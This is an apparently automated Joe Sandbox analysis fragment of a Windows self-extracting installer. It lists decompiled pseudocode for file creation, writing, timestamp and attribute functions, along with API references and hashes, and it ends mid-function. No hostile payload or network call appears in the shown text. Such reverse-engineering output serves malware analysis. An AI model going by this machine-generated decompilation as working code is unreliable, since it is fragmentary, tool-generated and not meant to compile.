                                                                        0x00f34d4a
                                                                        0x00f34d4c
                                                                        0x00f34d4f
                                                                        0x00f34d4f
                                                                        0x00f34d51
                                                                        0x00f34d52
                                                                        0x00f34d52
                                                                        0x00f34d56
                                                                        0x00f34d5b
                                                                        0x00f34d5d
                                                                        0x00f34d62
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00f34d67
                                                                        0x00f34d6f
                                                                        0x00f34d74
                                                                        0x00f34d76
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00f34d7c
                                                                        0x00f34d84
                                                                        0x00f34d89
                                                                        0x00f34d8b
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00f34d94
                                                                        0x00f34d99
                                                                        0x00f34d9e
                                                                        0x00f34da1
                                                                        0x00f34daa
                                                                        0x00f34daa
                                                                        0x00f34da3
                                                                        0x00f34da3
                                                                        0x00f34da3
                                                                        0x00f34db5
                                                                        0x00f34dbb
                                                                        0x00f34dbd
                                                                        0x00000000
                                                                        0x00f34dc3
                                                                        0x00f34dc5
                                                                        0x00000000
                                                                        0x00f34dc5
                                                                        0x00f34dbd
                                                                        0x00f34d2a
                                                                        0x00f34d2a
                                                                        0x00f34d2d
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00f34d2d
                                                                        0x00f34cf8
                                                                        0x00f34cfd
                                                                        0x00f34d02
                                                                        0x00000000

                                                                        APIs
                                                                        • SetFileAttributesA.KERNELBASE(?,?,?,?), ref: 00F34DB5
                                                                        • SetDlgItemTextA.USER32(00000000,00000837,?), ref: 00F34DDD
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.319721408.0000000000F31000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F30000, based on PE: true
                                                                        • Associated: 00000001.00000002.319714068.0000000000F30000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000001.00000002.319734503.0000000000F38000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000001.00000002.319741169.0000000000F3A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000001.00000002.319741169.0000000000F3C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_f30000_bPsg.jbxd
                                                                        Similarity
                                                                        • API ID: AttributesFileItemText
                                                                        • String ID: C:\Users\user~1\AppData\Local\Temp\IXP001.TMP\
                                                                        • API String ID: 3625706803-3217841213
                                                                        • Opcode ID: 9c959cc6522ae589e984a9ab53e324524f8708f20003165f96e0d5555ed042a0
                                                                        • Instruction ID: 0f5e4a960bd690188966fdebccd34aa0994000d795f6e42372641869aecdd3f3
                                                                        • Opcode Fuzzy Hash: 9c959cc6522ae589e984a9ab53e324524f8708f20003165f96e0d5555ed042a0
                                                                        • Instruction Fuzzy Hash: F5414336A042058BCB259F38DC446B5B3A5FB45330F044668E88297695DF35FE8AFB50
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E00F34C37(signed int __ecx, int __edx, int _a4) {
                                                                        				struct _FILETIME _v12;
                                                                        				struct _FILETIME _v20;
                                                                        				FILETIME* _t14;
                                                                        				int _t15;
                                                                        				signed int _t21;
                                                                        
                                                                        				_t21 = __ecx * 0x18;
                                                                        				if( *((intOrPtr*)(_t21 + 0xf38d64)) == 1 || DosDateTimeToFileTime(__edx, _a4,  &_v20) == 0 || LocalFileTimeToFileTime( &_v20,  &_v12) == 0) {
                                                                        					L5:
                                                                        					return 0;
                                                                        				} else {
                                                                        					_t14 =  &_v12;
                                                                        					_t15 = SetFileTime( *(_t21 + 0xf38d74), _t14, _t14, _t14); // executed
                                                                        					if(_t15 == 0) {
                                                                        						goto L5;
                                                                        					}
                                                                        					return 1;
                                                                        				}
                                                                        			}








                                                                        0x00f34c40
                                                                        0x00f34c4a
                                                                        0x00f34c8d
                                                                        0x00000000
                                                                        0x00f34c70
                                                                        0x00f34c70
                                                                        0x00f34c7e
                                                                        0x00f34c86
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00f34c8a

                                                                        APIs
                                                                        • DosDateTimeToFileTime.KERNEL32(?,?,?), ref: 00F34C54
                                                                        • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00F34C66
                                                                        • SetFileTime.KERNELBASE(?,?,?,?), ref: 00F34C7E
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.319721408.0000000000F31000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F30000, based on PE: true
                                                                        • Associated: 00000001.00000002.319714068.0000000000F30000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000001.00000002.319734503.0000000000F38000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000001.00000002.319741169.0000000000F3A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000001.00000002.319741169.0000000000F3C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_f30000_bPsg.jbxd
                                                                        Similarity
                                                                        • API ID: Time$File$DateLocal
                                                                        • String ID:
                                                                        • API String ID: 2071732420-0
                                                                        • Opcode ID: f5357b7aa0f94f414bbe990df9474703414f504428703d4edeac594e3f949e94
                                                                        • Instruction ID: 32d7b7572633b7db43b9baf5adc057937b7832d4cb13ac17a07016b595d07400
                                                                        • Opcode Fuzzy Hash: f5357b7aa0f94f414bbe990df9474703414f504428703d4edeac594e3f949e94
                                                                        • Instruction Fuzzy Hash: 07F09073A0120CAF9B24EFB5CC48DBB77ADEB142B0B44052AB855C1050EA30FA14FBA0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 75%
                                                                        			E00F3487A(CHAR* __ecx, signed int __edx) {
                                                                        				void* _t7;
                                                                        				CHAR* _t11;
                                                                        				long _t18;
                                                                        				long _t23;
                                                                        
                                                                        				_t11 = __ecx;
                                                                        				asm("sbb edi, edi");
                                                                        				_t18 = ( ~(__edx & 3) & 0xc0000000) + 0x80000000;
                                                                        				if((__edx & 0x00000100) == 0) {
                                                                        					asm("sbb esi, esi");
                                                                        					_t23 = ( ~(__edx & 0x00000200) & 0x00000002) + 3;
                                                                        				} else {
                                                                        					if((__edx & 0x00000400) == 0) {
                                                                        						asm("sbb esi, esi");
                                                                        						_t23 = ( ~(__edx & 0x00000200) & 0xfffffffe) + 4;
                                                                        					} else {
                                                                        						_t23 = 1;
                                                                        					}
                                                                        				}
                                                                        				_t7 = CreateFileA(_t11, _t18, 0, 0, _t23, 0x80, 0); // executed
                                                                        				if(_t7 != 0xffffffff || _t23 == 3) {
                                                                        					return _t7;
                                                                        				} else {
                                                                        					E00F3490C(_t11);
                                                                        					return CreateFileA(_t11, _t18, 0, 0, _t23, 0x80, 0);
                                                                        				}
                                                                        			}







                                                                        0x00f34880
                                                                        0x00f3488c
                                                                        0x00f34894
                                                                        0x00f348a0
                                                                        0x00f348c9
                                                                        0x00f348ce
                                                                        0x00f348a2
                                                                        0x00f348a8
                                                                        0x00f348b7
                                                                        0x00f348bc
                                                                        0x00f348aa
                                                                        0x00f348ac
                                                                        0x00f348ac
                                                                        0x00f348a8
                                                                        0x00f348de
                                                                        0x00f348e7
                                                                        0x00f3490b
                                                                        0x00f348ee
                                                                        0x00f348f0
                                                                        0x00000000
                                                                        0x00f34902

                                                                        APIs
                                                                        • CreateFileA.KERNELBASE(00008000,-80000000,00000000,00000000,?,00000080,00000000,00000000,00000000,00000000,00F34A23,?,00F34F67,*MEMCAB,00008000,00000180), ref: 00F348DE
                                                                        • CreateFileA.KERNEL32(00008000,-80000000,00000000,00000000,?,00000080,00000000,?,00F34F67,*MEMCAB,00008000,00000180), ref: 00F34902
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.319721408.0000000000F31000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F30000, based on PE: true
                                                                        • Associated: 00000001.00000002.319714068.0000000000F30000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000001.00000002.319734503.0000000000F38000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000001.00000002.319741169.0000000000F3A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000001.00000002.319741169.0000000000F3C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_f30000_bPsg.jbxd
                                                                        Similarity
                                                                        • API ID: CreateFile
                                                                        • String ID:
                                                                        • API String ID: 823142352-0
                                                                        • Opcode ID: 007286084d36b2904d378b0e652dd4bfe68af73399bfeb1acaf7a3205b0ba6e7
                                                                        • Instruction ID: bbe75baaaac6726016453a24a17a9c41ce71563ce846e91bab7f343d6fd6416c
                                                                        • Opcode Fuzzy Hash: 007286084d36b2904d378b0e652dd4bfe68af73399bfeb1acaf7a3205b0ba6e7
                                                                        • Instruction Fuzzy Hash: A50169A3E125742AF32490298C88FB7651DCBD6734F1B0334BDEAE72D2D564AC04A1E0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 93%
                                                                        			E00F34AD0(signed int _a4, void* _a8, long _a12) {
                                                                        				signed int _t9;
                                                                        				int _t12;
                                                                        				signed int _t14;
                                                                        				signed int _t15;
                                                                        				void* _t20;
                                                                        				struct HWND__* _t21;
                                                                        				signed int _t24;
                                                                        				signed int _t25;
                                                                        
                                                                        				_t20 =  *0xf3858c; // 0x268
                                                                        				_t9 = E00F33680(_t20);
                                                                        				if( *0xf391d8 == 0) {
                                                                        					_push(_t24);
                                                                        					_t12 = WriteFile( *(0xf38d74 + _a4 * 0x18), _a8, _a12,  &_a12, 0); // executed
                                                                        					if(_t12 != 0) {
                                                                        						_t25 = _a12;
                                                                        						if(_t25 != 0xffffffff) {
                                                                        							_t14 =  *0xf39400; // 0x40400
                                                                        							_t15 = _t14 + _t25;
                                                                        							 *0xf39400 = _t15;
                                                                        							if( *0xf38184 != 0) {
                                                                        								_t21 =  *0xf38584; // 0x0
                                                                        								if(_t21 != 0) {
                                                                        									SendDlgItemMessageA(_t21, 0x83a, 0x402, _t15 * 0x64 /  *0xf393f8, 0);
                                                                        								}
                                                                        							}
                                                                        						}
                                                                        					} else {
                                                                        						_t25 = _t24 | 0xffffffff;
                                                                        					}
                                                                        					return _t25;
                                                                        				} else {
                                                                        					return _t9 | 0xffffffff;
                                                                        				}
                                                                        			}











                                                                        0x00f34ad5
                                                                        0x00f34adb
                                                                        0x00f34ae7
                                                                        0x00f34aee
                                                                        0x00f34b05
                                                                        0x00f34b0d
                                                                        0x00f34b14
                                                                        0x00f34b1a
                                                                        0x00f34b1c
                                                                        0x00f34b21
                                                                        0x00f34b2a
                                                                        0x00f34b2f
                                                                        0x00f34b31
                                                                        0x00f34b39
                                                                        0x00f34b54
                                                                        0x00f34b54
                                                                        0x00f34b39
                                                                        0x00f34b2f
                                                                        0x00f34b0f
                                                                        0x00f34b0f
                                                                        0x00f34b0f
                                                                        0x00f34b5e
                                                                        0x00f34ae9
                                                                        0x00f34aed
                                                                        0x00f34aed

                                                                        APIs
                                                                          • Part of subcall function 00F33680: MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000004FF), ref: 00F3369F
                                                                          • Part of subcall function 00F33680: PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 00F336B2
                                                                          • Part of subcall function 00F33680: PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 00F336DA
                                                                        • WriteFile.KERNELBASE(?,?,?,?,00000000), ref: 00F34B05
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.319721408.0000000000F31000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F30000, based on PE: true
                                                                        • Associated: 00000001.00000002.319714068.0000000000F30000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000001.00000002.319734503.0000000000F38000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000001.00000002.319741169.0000000000F3A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000001.00000002.319741169.0000000000F3C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_f30000_bPsg.jbxd
                                                                        Similarity
                                                                        • API ID: MessagePeek$FileMultipleObjectsWaitWrite
                                                                        • String ID:
                                                                        • API String ID: 1084409-0
                                                                        • Opcode ID: 340955b13495c215203c0d35237466250ff7fd4b2a1184d70f7da6669ef18ee4
                                                                        • Instruction ID: bf011d34dc07c5783e3825367f5be21c2b8a5f3d38e00f2274309b1578a1d512
                                                                        • Opcode Fuzzy Hash: 340955b13495c215203c0d35237466250ff7fd4b2a1184d70f7da6669ef18ee4
                                                                        • Instruction Fuzzy Hash: 3501B531600309ABDB149F59DC05BA6B75AFB84735F048265F9399B1F1CBB4E812FB50
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E00F3658A(char* __ecx, void* __edx, char* _a4) {
                                                                        				intOrPtr _t4;
                                                                        				char* _t6;
                                                                        				char* _t8;
                                                                        				void* _t10;
                                                                        				void* _t12;
                                                                        				char* _t16;
                                                                        				intOrPtr* _t17;
                                                                        				void* _t18;
                                                                        				char* _t19;
                                                                        
                                                                        				_t16 = __ecx;
                                                                        				_t10 = __edx;
                                                                        				_t17 = __ecx;
                                                                        				_t1 = _t17 + 1; // 0xf38b3f
                                                                        				_t12 = _t1;
                                                                        				do {
                                                                        					_t4 =  *_t17;
                                                                        					_t17 = _t17 + 1;
                                                                        				} while (_t4 != 0);
                                                                        				_t18 = _t17 - _t12;
                                                                        				_t2 = _t18 + 1; // 0xf38b40
                                                                        				if(_t2 < __edx) {
                                                                        					_t19 = _t18 + __ecx;
                                                                        					if(_t19 > __ecx) {
                                                                        						_t8 = CharPrevA(__ecx, _t19); // executed
                                                                        						if( *_t8 != 0x5c) {
                                                                        							 *_t19 = 0x5c;
                                                                        							_t19 =  &(_t19[1]);
                                                                        						}
                                                                        					}
                                                                        					_t6 = _a4;
                                                                        					 *_t19 = 0;
                                                                        					while( *_t6 == 0x20) {
                                                                        						_t6 = _t6 + 1;
                                                                        					}
                                                                        					return E00F316B3(_t16, _t10, _t6);
                                                                        				}
                                                                        				return 0x8007007a;
                                                                        			}












                                                                        0x00f36592
                                                                        0x00f36594
                                                                        0x00f36596
                                                                        0x00f36598
                                                                        0x00f36598
                                                                        0x00f3659b
                                                                        0x00f3659b
                                                                        0x00f3659d
                                                                        0x00f3659e
                                                                        0x00f365a2
                                                                        0x00f365a4
                                                                        0x00f365a9
                                                                        0x00f365b2
                                                                        0x00f365b6
                                                                        0x00f365ba
                                                                        0x00f365c3
                                                                        0x00f365c5
                                                                        0x00f365c8
                                                                        0x00f365c8
                                                                        0x00f365c3
                                                                        0x00f365c9
                                                                        0x00f365cc
                                                                        0x00f365d2
                                                                        0x00f365d1
                                                                        0x00f365d1
                                                                        0x00000000
                                                                        0x00f365dc
                                                                        0x00000000

                                                                        APIs
                                                                        • CharPrevA.USER32(00F38B3E,00F38B3F,00000001,00F38B3E,-00000003,?,00F360EC,00F31140,?), ref: 00F365BA
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.319721408.0000000000F31000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F30000, based on PE: true
                                                                        • Associated: 00000001.00000002.319714068.0000000000F30000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000001.00000002.319734503.0000000000F38000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000001.00000002.319741169.0000000000F3A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000001.00000002.319741169.0000000000F3C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_f30000_bPsg.jbxd
                                                                        Similarity
                                                                        • API ID: CharPrev
                                                                        • String ID:
                                                                        • API String ID: 122130370-0
                                                                        • Opcode ID: 20c4888a9347dd950afb0d7262f1968e5f760b699771d7802c8e66cac6584037
                                                                        • Instruction ID: 5f758e793f92eb4ce9e5f0afd162a3d5bc758e26f7d423a12df6e88e864139cc
                                                                        • Opcode Fuzzy Hash: 20c4888a9347dd950afb0d7262f1968e5f760b699771d7802c8e66cac6584037
                                                                        • Instruction Fuzzy Hash: 4FF02833504250BBD331091A9884BA6BFDA9B86370F2C817AE8DAC3305CA658C45A2B4
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 93%
                                                                        			E00F3621E() {
                                                                        				signed int _v8;
                                                                        				char _v268;
                                                                        				signed int _t5;
                                                                        				void* _t9;
                                                                        				void* _t13;
                                                                        				void* _t19;
                                                                        				void* _t20;
                                                                        				signed int _t21;
                                                                        
                                                                        				_t5 =  *0xf38004; // 0xc69e30f7
                                                                        				_v8 = _t5 ^ _t21;
                                                                        				if(GetWindowsDirectoryA( &_v268, 0x104) != 0) {
                                                                        					0x4f0 = 2;
                                                                        					_t9 = E00F3597D( &_v268, 0x4f0, _t19, 0x4f0); // executed
                                                                        				} else {
                                                                        					E00F344B9(0, 0x4f0, _t8, _t8, 0x10, _t8);
                                                                        					 *0xf39124 = E00F36285();
                                                                        					_t9 = 0;
                                                                        				}
                                                                        				return E00F36CE0(_t9, _t13, _v8 ^ _t21, 0x4f0, _t19, _t20);
                                                                        			}











                                                                        0x00f36229
                                                                        0x00f36230
                                                                        0x00f36247
                                                                        0x00f3626a
                                                                        0x00f36272
                                                                        0x00f36249
                                                                        0x00f36255
                                                                        0x00f3625f
                                                                        0x00f36264
                                                                        0x00f36264
                                                                        0x00f36284

                                                                        APIs
                                                                        • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00F3623F
                                                                          • Part of subcall function 00F344B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00F34518
                                                                          • Part of subcall function 00F344B9: MessageBoxA.USER32(?,?,lenta,00010010), ref: 00F34554
                                                                          • Part of subcall function 00F36285: GetLastError.KERNEL32(00F35BBC), ref: 00F36285
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.319721408.0000000000F31000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F30000, based on PE: true
                                                                        • Associated: 00000001.00000002.319714068.0000000000F30000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000001.00000002.319734503.0000000000F38000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000001.00000002.319741169.0000000000F3A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000001.00000002.319741169.0000000000F3C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_f30000_bPsg.jbxd
                                                                        Similarity
                                                                        • API ID: DirectoryErrorLastLoadMessageStringWindows
                                                                        • String ID:
                                                                        • API String ID: 381621628-0
                                                                        • Opcode ID: 07423c03d3ac3780496d338d93eda6df1806838d551ad08bd899b2ecdd3abbbb
                                                                        • Instruction ID: 7c093404563bc3491d400414a3543253200d60f2c4c254a884f393bdcf25f926
                                                                        • Opcode Fuzzy Hash: 07423c03d3ac3780496d338d93eda6df1806838d551ad08bd899b2ecdd3abbbb
                                                                        • Instruction Fuzzy Hash: F2F0E9B0704208BBDB50EB748D06FBF33ADDB54720F414069B9C5D6191DDB8DD44A650
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E00F34B60(signed int _a4) {
                                                                        				signed int _t9;
                                                                        				signed int _t15;
                                                                        
                                                                        				_t15 = _a4 * 0x18;
                                                                        				if( *((intOrPtr*)(_t15 + 0xf38d64)) != 1) {
                                                                        					_t9 = FindCloseChangeNotification( *(_t15 + 0xf38d74)); // executed
                                                                        					if(_t9 == 0) {
                                                                        						return _t9 | 0xffffffff;
                                                                        					}
                                                                        					 *((intOrPtr*)(_t15 + 0xf38d60)) = 1;
                                                                        					return 0;
                                                                        				}
                                                                        				 *((intOrPtr*)(_t15 + 0xf38d60)) = 1;
                                                                        				 *((intOrPtr*)(_t15 + 0xf38d68)) = 0;
                                                                        				 *((intOrPtr*)(_t15 + 0xf38d70)) = 0;
                                                                        				 *((intOrPtr*)(_t15 + 0xf38d6c)) = 0;
                                                                        				return 0;
                                                                        			}





                                                                        0x00f34b66
                                                                        0x00f34b74
                                                                        0x00f34b98
                                                                        0x00f34ba0
                                                                        0x00000000
                                                                        0x00f34bac
                                                                        0x00f34ba4
                                                                        0x00000000
                                                                        0x00f34ba4
                                                                        0x00f34b78
                                                                        0x00f34b7e
                                                                        0x00f34b84
                                                                        0x00f34b8a
                                                                        0x00000000

                                                                        APIs
                                                                        • FindCloseChangeNotification.KERNELBASE(?,00000000,00000000,?,00F34FA1,00000000), ref: 00F34B98
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.319721408.0000000000F31000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F30000, based on PE: true
                                                                        • Associated: 00000001.00000002.319714068.0000000000F30000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000001.00000002.319734503.0000000000F38000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000001.00000002.319741169.0000000000F3A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000001.00000002.319741169.0000000000F3C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_f30000_bPsg.jbxd
                                                                        Similarity
                                                                        • API ID: ChangeCloseFindNotification
                                                                        • String ID:
                                                                        • API String ID: 2591292051-0
                                                                        • Opcode ID: 674169ce542a271a7226143c06df6a34427d89d4c9b59f45791e96f78132f9b9
                                                                        • Instruction ID: ae7c5efed95b6d43bac1e8b0c4652f379335c7de43c59ad72c09b3acc65d4a99
                                                                        • Opcode Fuzzy Hash: 674169ce542a271a7226143c06df6a34427d89d4c9b59f45791e96f78132f9b9
                                                                        • Instruction Fuzzy Hash: 81F0F471900B089E47618E399C00652FBE5AAF53B0750092AB4AED2190FB34B542FB90
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E00F366AE(CHAR* __ecx) {
                                                                        				unsigned int _t1;
                                                                        
                                                                        				_t1 = GetFileAttributesA(__ecx); // executed
                                                                        				if(_t1 != 0xffffffff) {
                                                                        					return  !(_t1 >> 4) & 0x00000001;
                                                                        				} else {
                                                                        					return 0;
                                                                        				}
                                                                        			}




                                                                        0x00f366b1
                                                                        0x00f366ba
                                                                        0x00f366c7
                                                                        0x00f366bc
                                                                        0x00f366be
                                                                        0x00f366be

                                                                        APIs
                                                                        • GetFileAttributesA.KERNELBASE(?,00F34777,?,00F34E38,?), ref: 00F366B1
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.319721408.0000000000F31000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F30000, based on PE: true
                                                                        • Associated: 00000001.00000002.319714068.0000000000F30000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000001.00000002.319734503.0000000000F38000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000001.00000002.319741169.0000000000F3A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000001.00000002.319741169.0000000000F3C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_f30000_bPsg.jbxd
                                                                        Similarity
                                                                        • API ID: AttributesFile
                                                                        • String ID:
                                                                        • API String ID: 3188754299-0
                                                                        • Opcode ID: 966cff803ea6bcba97d07b0c6f631ed4092a59528e03c780b2d87fa7d2079c53
                                                                        • Instruction ID: e411fdd1a329e5a574d59583015d41b91b4bc54507f526b9fb9aff07c76bf1ff
                                                                        • Opcode Fuzzy Hash: 966cff803ea6bcba97d07b0c6f631ed4092a59528e03c780b2d87fa7d2079c53
                                                                        • Instruction Fuzzy Hash: BDB092B6622444526A2406726C2A55A3846A6C123ABE45B90F032C11E0CA3EC846E004
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E00F34CA0(long _a4) {
                                                                        				void* _t2;
                                                                        
                                                                        				_t2 = GlobalAlloc(0, _a4); // executed
                                                                        				return _t2;
                                                                        			}




                                                                        0x00f34caa
                                                                        0x00f34cb1

                                                                        APIs
                                                                        • GlobalAlloc.KERNELBASE(00000000,?), ref: 00F34CAA
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.319721408.0000000000F31000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F30000, based on PE: true
                                                                        • Associated: 00000001.00000002.319714068.0000000000F30000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000001.00000002.319734503.0000000000F38000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000001.00000002.319741169.0000000000F3A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000001.00000002.319741169.0000000000F3C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_f30000_bPsg.jbxd
                                                                        Similarity
                                                                        • API ID: AllocGlobal
                                                                        • String ID:
                                                                        • API String ID: 3761449716-0
                                                                        • Opcode ID: 37cc40ff26369961c8cb86e1ad0b34360abea363d570ad2cae7134f543db14ca
                                                                        • Instruction ID: 0cef58097594c3fbaabab30a253b9b360a416f52ae7da61bfa4571ce1301401e
                                                                        • Opcode Fuzzy Hash: 37cc40ff26369961c8cb86e1ad0b34360abea363d570ad2cae7134f543db14ca
                                                                        • Instruction Fuzzy Hash: 89B0123204430CB7CF001FC3EC09F853F1EE7C4771F140040F60C450508A7294109696
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E00F34CC0(void* _a4) {
                                                                        				void* _t2;
                                                                        
                                                                        				_t2 = GlobalFree(_a4); // executed
                                                                        				return _t2;
                                                                        			}




                                                                        0x00f34cc8
                                                                        0x00f34ccf

                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.319721408.0000000000F31000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F30000, based on PE: true
                                                                        • Associated: 00000001.00000002.319714068.0000000000F30000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000001.00000002.319734503.0000000000F38000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000001.00000002.319741169.0000000000F3A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000001.00000002.319741169.0000000000F3C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_f30000_bPsg.jbxd
                                                                        Similarity
                                                                        • API ID: FreeGlobal
                                                                        • String ID:
                                                                        • API String ID: 2979337801-0
                                                                        • Opcode ID: 242dc43dc11564f61ac0089def906d4e3478d13e7ef772c647d4f54f8279cab9
                                                                        • Instruction ID: aa1b02d6bdd4870ffc77c7f9ed4120326adc8db0aab9edf63164de58840132bc
                                                                        • Opcode Fuzzy Hash: 242dc43dc11564f61ac0089def906d4e3478d13e7ef772c647d4f54f8279cab9
                                                                        • Instruction Fuzzy Hash: B9B0123100010CB78F001B43EC088453F1ED6C02707000050F50C410218B3398119585
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 92%
                                                                        			E00F35C9E(void* __ebx, CHAR* __ecx, void* __edi, void* __esi) {
                                                                        				signed int _v8;
                                                                        				signed int _v12;
                                                                        				CHAR* _v265;
                                                                        				char _v266;
                                                                        				char _v267;
                                                                        				char _v268;
                                                                        				CHAR* _v272;
                                                                        				char _v276;
                                                                        				signed int _v296;
                                                                        				char _v556;
                                                                        				signed int _t61;
                                                                        				int _t63;
                                                                        				char _t67;
                                                                        				CHAR* _t69;
                                                                        				signed int _t71;
                                                                        				void* _t75;
                                                                        				char _t79;
                                                                        				void* _t83;
                                                                        				void* _t85;
                                                                        				void* _t87;
                                                                        				intOrPtr _t88;
                                                                        				void* _t100;
                                                                        				intOrPtr _t101;
                                                                        				CHAR* _t104;
                                                                        				intOrPtr _t105;
                                                                        				void* _t111;
                                                                        				void* _t115;
                                                                        				CHAR* _t118;
                                                                        				void* _t119;
                                                                        				void* _t127;
                                                                        				CHAR* _t129;
                                                                        				void* _t132;
                                                                        				void* _t142;
                                                                        				signed int _t143;
                                                                        				CHAR* _t144;
                                                                        				void* _t145;
                                                                        				void* _t146;
                                                                        				void* _t147;
                                                                        				void* _t149;
                                                                        				char _t155;
                                                                        				void* _t157;
                                                                        				void* _t162;
                                                                        				void* _t163;
                                                                        				char _t167;
                                                                        				char _t170;
                                                                        				CHAR* _t173;
                                                                        				void* _t177;
                                                                        				intOrPtr* _t183;
                                                                        				intOrPtr* _t192;
                                                                        				CHAR* _t199;
                                                                        				void* _t200;
                                                                        				CHAR* _t201;
                                                                        				void* _t205;
                                                                        				void* _t206;
                                                                        				int _t209;
                                                                        				void* _t210;
                                                                        				void* _t212;
                                                                        				void* _t213;
                                                                        				CHAR* _t218;
                                                                        				intOrPtr* _t219;
